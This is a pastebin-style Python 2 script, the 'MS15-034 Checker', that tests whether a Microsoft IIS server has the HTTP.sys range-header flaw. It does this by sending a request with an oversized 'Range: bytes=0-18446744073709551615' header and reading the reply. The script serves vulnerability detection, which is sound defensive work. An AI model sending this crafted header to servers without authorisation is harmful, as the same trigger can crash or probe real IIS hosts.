SHARE
TWEET

MS15-034 Checker

a guest Apr 14th, 2015 37,791 Never
  1. '''
  2. ___.                                   .___ __                         __  
  3. \_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
  4. | __ \_/ __ <   |  |/  _ \ /    \ / __ |\  __\_  __ \ |  \/  ___/\  __\
  5. | \_\ \ ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \ |  |  
  6. |___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|  
  7.     \/     \/\/                \/      \/                        \/        
  8.                                                            MS15-034 Checker
  9.  
  10. Danger! This script has not been properly qa'd and will probably fail in terrible ways.
  11. It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
  12. result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
  13. an HTTP range request.
  14. -BF
  15.  
  16.  
  17. 8a8b2112 56              push    esi
  18. 8a8b2113 6a00            push    0
  19. 8a8b2115 2bc7            sub     eax,edi
  20. 8a8b2117 6a01            push    1
  21. 8a8b2119 1bca            sbb     ecx,edx
  22. 8a8b211b 51              push    ecx
  23. 8a8b211c 50              push    eax
  24. 8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
  25.  
  26. '''
  27. import socket
  28. import random
  29.  
  30. ipAddr = ""
  31. hexAllFfff = "18446744073709551615"
  32.  
  33. req1 = "GET / HTTP/1.0\r\n\r\n"
  34. req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
  35.  
  36. print "[*] Audit Started"
  37. client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  38. client_socket.connect((ipAddr, 80))
  39. client_socket.send(req1)
  40. boringResp = client_socket.recv(1024)
  41. if "Microsoft" not in boringResp:
  42.                 print "[*] Not IIS"
  43.                 exit(0)
  44. client_socket.close()
  45. client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  46. client_socket.connect((ipAddr, 80))
  47. client_socket.send(req)
  48. goodResp = client_socket.recv(1024)
  49. if "Requested Range Not Satisfiable" in goodResp:
  50.                 print "[!!] Looks VULN"
  51. elif " The request has an invalid header name" in goodResp:
  52.                 print "[*] Looks Patched"
  53. else:
  54.                 print "[*] Unexpected response, cannot discern patch status"
RAW Paste Data
Top